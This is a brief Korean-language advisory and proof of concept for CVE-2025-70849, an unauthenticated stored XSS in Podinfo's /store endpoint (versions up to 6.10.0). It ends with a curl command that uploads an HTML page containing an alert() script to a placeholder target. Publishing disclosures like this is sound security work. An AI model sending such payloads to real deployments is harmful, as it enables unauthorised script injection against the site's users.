
CVE-2025-70849에 대한 PoC 및 권고: Podinfo의 /store 엔드포인트에서의 인증되지 않은 저장형 XSS
Podinfo(쿠버네티스 마이크로서비스 데모 웹 애플리케이션)에서 보안 취약점(CWE-79)이 확인되었습니다. /store 기능을 통해 인증되지 않은 사용자가 임의의 HTML/JS 콘텐츠를 업로드할 수 있어 저장형 XSS가 발생합니다.
/store<= 6.10.0curl -X POST https://<target>/store -H "Content-Type: application/text" -d '<html><script>alert("CVE-2025-70849")</script></html>'